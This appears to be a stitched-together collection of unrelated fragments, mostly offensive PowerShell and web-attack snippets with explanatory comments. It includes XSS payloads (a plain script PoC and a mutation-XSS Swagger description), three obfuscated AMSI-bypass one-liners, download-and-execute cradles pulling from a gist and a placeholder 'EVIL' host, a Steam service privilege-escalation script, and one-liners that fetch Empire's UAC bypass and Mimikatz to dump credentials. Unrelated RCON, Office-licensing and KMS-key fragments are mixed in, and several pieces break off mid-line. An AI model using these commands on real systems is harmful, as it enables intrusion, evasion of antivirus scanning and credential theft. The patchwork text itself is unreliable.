#Variables
# Connection settings consumed by the RCON client code that follows. $Password
# is presumably the RCON login secret — do not commit a real value into this
# file; prompt for it (Read-Host -AsSecureString) or read it from an
# environment variable at run time instead.
$serverAddress = "127.0.0.1"
$serverPort = 25575   # NOTE(review): looks like the conventional Minecraft RCON port — confirm for the target server
$Password = ""        # intentionally empty here; must be supplied before authenticating
# Promote every non-terminating error to a terminating one so a failed socket
# write or bad auth response stops the script instead of being printed and ignored.
$ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop
class RconPacket { | |
# https://developer.valvesoftware.com/wiki/Source_RCON_Protocol | |
hidden [byte[]] $pktSize | |
[byte[]] $PktId |
<!-- Minimal stored/upload XSS proof-of-concept. If the target serves this
     markup back unescaped with an HTML content type, the alert fires in the
     target's origin; alert(document.domain) is used rather than alert(1) so
     the popup proves *which* origin executed the script. -->
<html>
<body>
<script>alert(document.domain)</script>
</body>
</html>
@echo off
rem Installs the Office 2016/365 ProPlus volume-license (KMS and MAK) .xrm-ms
rem license files through ospp.vbs. Presumably needs an elevated prompt — confirm.
rem The script continues past the end of this excerpt.
echo #Supported products: Office 365 ProPlus (x86-x64)
echo.
echo.
rem Change into the Office16 directory (64-bit path first, then the 32-bit one)
rem so the relative ospp.vbs / ..\root\Licenses16 paths below resolve.
rem NOTE(review): nothing checks that either cd happened; if neither path exists
rem the for-loops below run in whatever the current directory was.
(if exist "%ProgramFiles%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles%\Microsoft Office\Office16")
(if exist "%ProgramFiles(x86)%\Microsoft Office\Office16\ospp.vbs" cd /d "%ProgramFiles(x86)%\Microsoft Office\Office16")
rem Install every matching KMS license, then every matching MAK license.
rem Output is discarded (>nul), so a failed /inslic is silent — remove >nul or
rem check %errorlevel% when troubleshooting. for /f splits on whitespace by
rem default, so a license file name containing a space would be truncated.
(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul)
(for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul)
echo.
echo ============================================================================
# Swagger 2.0 document whose `info.description` carries an XSS payload. The
# <form>/<math>/<mglyph>/<svg>/<textarea> nesting looks like a mutation-XSS
# (sanitiser-bypass) construction: the browser re-parses it into a live
# <img onerror=...>, so it fires in any API-docs UI that renders `description`
# as HTML without (or with a bypassable) sanitiser. Load it only into a
# throwaway/instrumented viewer. The spec continues past this excerpt.
swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('XSS\n'+document.domain) src=1>"></form>
  version: production
basePath: /JSSResource/
produces:
  - application/xml
#Obfuscate the AMSI bypass
# All three variants below do the same thing: use reflection to set the private
# static field AmsiUtils.amsiInitFailed to $true. Going by the field name, the
# runtime then treats AMSI as failed-to-initialise and stops submitting script
# content for scanning. They differ only in how the type and field names are
# spelled on the line, to avoid a static string signature on the bypass itself.
#Powershell ISE > Start-Steroids
# Variant 1: literal names (the form most likely to be signatured).
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
#If Obfuscation is not working with steroids, split all string!
# Variant 2: the same names assembled by string concatenation.
[Ref].Assembly.GetType('System.Management.Automation.Am'+'siU'+'tils').GetField('am'+'siIn'+'itFai'+'led','NonPublic,Static').SetValue($null,$true)
#New Obfuscated method 2023
# Variant 3: names assembled with the -f format operator from two fragments.
$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.{0}{1}Utils'-f $b,$a)); $z=$Ref.GetField(('am{0}InitFailed'-f$a),'NonPublic,Static');$z.SetValue($null,$true)
# nishang - 2.2.0 (Jul 24, 2021)
# Change this to "attacker-local-ip" for internal sources
# Fetches a gist (the URL is already pinned to a commit hash, so the content is
# stable) and pipes it straight into iex — the body is never inspected before it
# runs. `wget` is the Invoke-WebRequest alias on Windows PowerShell (the alias
# is absent on PowerShell 7 on non-Windows hosts); -UseBasicParsing avoids the
# IE-based HTML parser.
wget('https://gist.githubusercontent.com/pich4ya/144d32262861b573279d15e653c4e08d/raw/6f019c4e2f1f62ffc0754d01dff745d3cec62057/Invoke-SoHighSoHigh.ps1') -UseBasicParsing|iex
1. Open CMD as Administrator | |
2. Paste the following commands into the command prompt one at a time, in the order shown.
cscript slmgr.vbs /ipk "SERIAL NUMBER HERE" | |
Replace SERIAL NUMBER HERE with the key below that matches your Windows 10 edition. (These are Microsoft's published KMS client setup keys: they only direct the machine to activate against a KMS host on your network, and are not retail product keys.)
Home/Core TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 | |
Home/Core (Country Specific) PVMJN-6DFY6-9CCP6-7BKTT-D3WVR | |
Home/Core (Single Language) 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH |
# Local privilege-escalation helper: creates a registry symbolic link from a
# Steam key under HKLM\SOFTWARE\WOW6432Node to the Steam Client Service's own
# service key, then restarts the service so it acts on the redirected key.
# The rest of the chain (and the use of $cmd) is past the end of this excerpt.
$cmd = Read-Host -Prompt 'Enter the command you wish to execute as system'
Write-Host "[*] Installing NTObjectManager..."
# Pulls NtObjectManager from the PowerShell Gallery at run time — an unpinned,
# network-dependent dependency; -Force suppresses the untrusted-repository
# prompt. Pre-stage the module (or pin -RequiredVersion) for a controlled engagement.
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service"
# CreateSymbolicLink(path, root, target). This presumes the current user can
# create keys under ...\Valve\Steam\Apps — TODO confirm on the target build;
# the call throws (and $ErrorActionPreference decides what happens) if not.
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\Apps\PrivEsc",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service")
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service"
# Restarting relies on the service's own ACL granting that right to ordinary
# users; an access-denied here means the technique does not apply.
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Sleeping 5 seconds"
# Fixed delay to let the restarted service process the redirected key before
# the next step (outside this excerpt).
Start-Sleep 5
# Download-and-execute cradles. Each fetches a script over plain HTTP and hands
# the text to Invoke-Expression (IEX); nothing verifies what was fetched, so an
# on-path attacker can swap the payload. Use HTTPS (or hash-check the body)
# unless the transport is already trusted. Lines continue past this excerpt.
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
# iwr = Invoke-WebRequest; relies on the response object converting to its
# Content string when IEX coerces it.
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
# Drives an invisible Internet Explorer instance and executes body.innerHTML.
# The fixed 5-second sleep is the only wait for navigation, and innerHTML is the
# DOM's re-serialised text rather than the raw bytes — a plain .ps1 containing
# < or & may come back altered (confirm against the served file).
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object |
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Both one-liners pull tooling from the EmpireProject/Empire `master` branch —
# unpinned, so the content can change or disappear underneath you; pin a commit
# SHA (raw.githubusercontent.com/<org>/<repo>/<sha>/...) before relying on them.
# -exec bypass only relaxes the script execution policy for this process; it is
# not an AMSI or logging bypass, so expect the full command line (including the
# URL) to show up in process-creation and script-block logs where enabled.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
# Presumably needs local admin / SeDebugPrivilege to read LSASS — confirm before use.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands |